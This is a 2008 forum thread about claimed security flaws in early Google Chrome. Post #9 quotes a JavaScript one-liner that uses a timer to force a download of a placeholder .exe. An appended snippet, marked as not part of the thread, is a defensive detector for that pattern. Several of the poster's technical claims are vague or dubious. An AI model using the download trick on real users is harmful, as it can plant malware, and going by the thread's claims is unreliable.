SV650.org - SV650 & Gladius 650 Forum



Old 10-09-08, 08:16 AM   #1
Baph
Guest
 
Posts: n/a
Default FAO Chrome users

Since it was recently posted about on the .Org, I figured I'd update a few folks. The known issues with Chrome are:

- A known crash. (geeks, POP EBP when EIP=0x01002FF4 - very easy to do when you know how). The crash causes all tabs, and all executables associated with Chrome to close.
- A known exploit. Chrome is set to allow automatic file downloads, and this can be abused maliciously. These files can be stored anywhere on the computer.
- A way to achieve privilege escalation, and effectively run code as the escalated user.
- The Chrome password store keeps passwords in PLAINTEXT. This combined with other issues above could provide an attacker with all passwords stored on a computer, with the site/server that they are associated.
- There is a buffer overflow exception when using the "Save As" dialog.

The instructions sent out by my company are that anyone found with Chrome installed on the PC, will be subject to disciplinary procedures.
Old 10-09-08, 10:35 AM   #2
mister c
Member
Mega Poster
 
 
Join Date: Feb 2007
Location: Crewe, Cheshire
Posts: 2,326
Default Re: FAO Chrome users

Glad I've wiped mine off then. I was watching "Click" on the BBC on Saturday & Google are paying money to Firefox for development.
I tried Chrome & still found that it crashes the same as FF when trying to open .pdf files. I have to revert to IE when doing certain things at work as a lot of files I need to download are .pdf.
Old 10-09-08, 11:02 AM   #3
Baph
Guest
 
Posts: n/a
Default Re: FAO Chrome users

I'm still wondering if anyone will understand the EBP/EIP reference, and its implications - or am I just too geeky? Oh, and googling is classed as cheating.

Last edited by Baph; 10-09-08 at 11:14 AM.
Old 10-09-08, 12:03 PM   #4
mister c
Member
Mega Poster
 
 
Join Date: Feb 2007
Location: Crewe, Cheshire
Posts: 2,326
Default Re: FAO Chrome users

Quote:
Originally Posted by Baph View Post
I'm still wondering if anyone will understand the EBP/EIP reference, and its implications - or am I just too geeky? Oh, and googling is classed as cheating.
Yup.
What??????
Maybe
I Don't Know
Who.
Think that covers every eventuality


What on earth is EBP/EIP interface?????????

Every Birds Pants/Even In Paris?????????
Old 10-09-08, 12:07 PM   #5
Baph
Guest
 
Posts: n/a
Default Re: FAO Chrome users

Quote:
Originally Posted by mister c View Post
Yup.
What??????
Maybe
I Don't Know
Who.
Think that covers every eventuality


What on earth is EBP/EIP interface?????????

Every Birds Pants/Even In Paris?????????


They're both registers in the CPU. Typically, the EBP is used to reference a stack frame, and the EIP is the current instruction within the stack (sort of an index).

When a procedure of code starts, you can tell, because EBP = ESP (another register).

That's not what I was getting at though, if someone on the .Org is geeky enough, my original post details HOW to make Chrome crash. I don't like revealing to all & sundry, because that crash is useful with some of the other problems in Chrome, and generally, if you know about the various registers in a CPU, you can't be bothered crashing someone's browser to achieve GUID escalations.
Old 10-09-08, 12:31 PM   #6
muffles
Guest
 
Posts: n/a
Default Re: FAO Chrome users

A shame I don't use FF (have before though, not sure which version) and I much prefer the Chrome interface to IE. Are Google planning on patching this or just leaving it for people to fix (hence the open source)?
Old 10-09-08, 12:36 PM   #7
Baph
Guest
 
Posts: n/a
Default Re: FAO Chrome users

Quote:
Originally Posted by muffles View Post
A shame I don't use FF (have before though, not sure which version) and I much prefer the Chrome interface to IE. Are Google planning on patching this or just leaving it for people to fix (hence the open source)?
From top to bottom, their intention is to fix 1, 3 & 5. 2 & 4 (automatic downloads & plaintext passwords) are a non-issue according to them.

Both are classed by Google as "features" not bugs.
Old 10-09-08, 12:39 PM   #8
muffles
Guest
 
Posts: n/a
Default Re: FAO Chrome users

Crikey, that's nice of them!!! You'll have to forgive my unfamiliarity with browser architecture (although I claim to work in IT) but the passwords, presumably these are just the ones where it always asks you if you want Chrome to save the password for you? If so, that's lucky, as I always click no anyway. Unless it has a problem with cookies too?

The automatic downloads sounds dodgy though, is it completely hidden from the user? I've downloaded a couple of things but it's always asked me, same as a normal link, I am assuming they have another mechanism to do this?
Old 10-09-08, 12:44 PM   #9
Baph
Guest
 
Posts: n/a
Default Re: FAO Chrome users

Quote:
Originally Posted by muffles View Post
Crikey, that's nice of them!!! You'll have to forgive my unfamiliarity with browser architecture (although I claim to work in IT) but the passwords, presumably these are just the ones where it always asks you if you want Chrome to save the password for you? If so, that's lucky, as I always click no anyway. Unless it has a problem with cookies too?

The automatic downloads sounds dodgy though, is it completely hidden from the user? I've downloaded a couple of things but it's always asked me, same as a normal link, I am assuming they have another mechanism to do this?
Again, not giving much information out, but you work in IT, so...

The automatic downloads bug can be kicked off with the following:
window.setTimeout("location.href='http://localhost/1.exe'", 3000);

That's just plain nasty. Especially considering that JavaScript could be used to execute 1.exe as well. The script can also specify where to save the file to, with the use of certain HTML headers. This can be ANYWHERE on your PC.

EDIT: Just found the specifics on the workaround for the automatic downloads. Apparently 149.29, released the day before yesterday resolves it.

The password saving requires your permission to save passwords.

Last edited by Baph; 10-09-08 at 12:51 PM.
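
Added example, not part of the original thread: a defender-side heuristic that scans page script text for the pattern quoted in the post above, a timer callback that navigates to an executable file. The function names, the extension list and the sample input are assumptions made for illustration.

```javascript
// Added example: flag timer-driven navigations to executable files in script
// text. Heuristic only (regex plus a small scanner), not a JavaScript parser.
const RISKY_EXT = /\.(exe|scr|bat|cmd|msi|pif|vbs)$/i;   // assumed list
const TIMER = /\bset(?:Timeout|Interval)\s*\(/g;
// location = 'URL', location.href = "URL", location.assign('URL'), location.replace("URL")
const NAV = /location(?:\.href)?\s*=\s*(['"])(.*?)\1|location\.(?:assign|replace)\(\s*(['"])(.*?)\3/g;

// Return the text from `start` (just after a "(") up to its matching ")",
// skipping quoted strings so parentheses inside them are not counted.
function callArguments(src, start) {
  let depth = 1, quote = null;
  for (let i = start; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === "\\") i++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === "`") quote = c;
    else if (c === "(") depth++;
    else if (c === ")" && --depth === 0) return src.slice(start, i);
  }
  return src.slice(start);                 // unbalanced call: scan to the end
}

// Path component only, so host names and query strings do not affect the match.
function pathOf(url) {
  try { return new URL(url, "http://placeholder.invalid/").pathname; }
  catch (e) { return url; }
}

function findTimedDownloads(src) {
  const findings = [];
  for (const t of src.matchAll(TIMER)) {
    const args = callArguments(src, t.index + t[0].length);
    for (const n of args.matchAll(NAV)) {
      const url = n[2] !== undefined ? n[2] : n[4];
      if (RISKY_EXT.test(pathOf(url))) findings.push({ timer: t[0].replace(/\s*\($/, ""), url });
    }
  }
  return findings;
}

// Constructed sample input; the first line is the snippet quoted in the post.
const SAMPLE = [
  `window.setTimeout("location.href='http://localhost/1.exe'", 3000);`,
  `setTimeout(function () { window.location = "/docs/report.pdf"; }, 500);`,
  `setInterval(() => location.assign('https://example.test/setup.msi?x=1'), 1000);`,
  `location.href = '/tool.exe';`,
].join("\n");
console.log(findTimedDownloads(SAMPLE));
```

Only the first and third sample lines are reported: the second navigates to a PDF, and the fourth is not inside a timer callback, so this heuristic leaves it to other checks.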
Old 10-09-08, 01:47 PM   #10
muffles
Guest
 
Posts: n/a
Default Re: FAO Chrome users

Cheers Baph! I don't know much JS but that's pseudocode enough for me to read - doesn't sound great. Off to download the latest version when I get in tonight